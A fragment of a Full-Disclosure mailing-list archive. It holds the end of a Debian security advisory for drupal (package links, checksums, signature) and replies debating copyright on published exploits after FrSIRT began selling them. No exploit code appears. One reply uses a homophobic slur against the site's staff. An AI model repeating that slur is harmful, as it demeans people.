  Size/MD5 checksum:82810 56bf3a054ca7430c85f50af7ae3927db

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3.orig.tar.gz
  Size/MD5 checksum:   471540 bf093c4c8aca7bba62833ea1df35702f

  Architecture independent components:

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6_all.deb
  Size/MD5 checksum:   501428 94c1787a8eb5be13d6909f442e670cea


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEGoSLW5ql+IAeqTIRAvTuAJ9sD9YUoEFKMzZUxUfqKi/96/j4WQCeLizm
RLS079/UH1PrRo4n36cKZ74=
=emeM
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[Georgi Guninski]

On Fri, Mar 17, 2006 at 08:44:10AM +0100, Michal Zalewski wrote:
> On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:
> 
> > If you puplish something without a license it is OPEN DOMAIN
> > That means people can use it, modify it, sell it...
> 
> That's nonsense. If I publish a book or a photo or a newspaper article
> without a lengthy license attached, you can copy it at will, too? The
> requirement of a license or a copyright notice is a long-running myth - it
> is good to have these, but they are not a legal requirement.
>

IANAL but believe that putting copyright sh*t in exploits/advisories
wouldn't hurt exploit writers (even if anonymous).

[1]
http://cve.mitre.org/compatible/product_type.html

just look how many lamers profit from copy/paste with the mouse
(hint - search for vulnerability database)

AFAIK hamericans are suing for getting fat because they eat too much, so
clear violations of international copyright law like this:

http://72.14.203.104/search?q=cache:r4EuqF0hL9YJ:www.frsirt.com/exploits/20041216.Guninski.php+copyright+guninski+site:www.frsirt.com&hl=bg&gl=bg&ct=clnk&cd=1

may raise some money with little to no investment in hungry lawyers.

another irony is the fact that v3nd0rs try to convince people that exploits
are illegal, but legitimate businesses *sell* exploits - [1].


-- 
ж

EOM




































































junk

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[poo]

bah those frogs were faghats anyway 
On 3/17/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:> If you puplish something without a license it is OPEN DOMAIN
> That means people can use it, modify it, sell it...That's nonsense. If I publish a book or a photo or a newspaper articlewithout a lengthy license attached, you can copy it at will, too? Therequirement of a license or a copyright notice is a long-running myth - it
is good to have these, but they are not a legal requirement.All your private writing, recording, coding, photography, etc is protectedby copyright, period. Unless you explicitly allow others to use your work,
it is not legal to do so, with certain specific common-sense exceptions(fair use clauses vary from place to place, but usually involveapplications that are either entirely non-commercial, or benefit thesociety).
In some places, it can be successfully argued that by deciding to releaseinformation during a press conference, on a mailing list, etc, grants someentities an implicit permission to do certain things with that
information, but it's generally rather tricky (and subject to individualinterpretation by the court). In any case, this just means that becauseyou posted to a mailing list, the server can reasonably process and store
your message, and distribute it to the intended audience. It does notnecessarily mean that others can grab it for unrelated purposes and sellit to third parties./mz___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/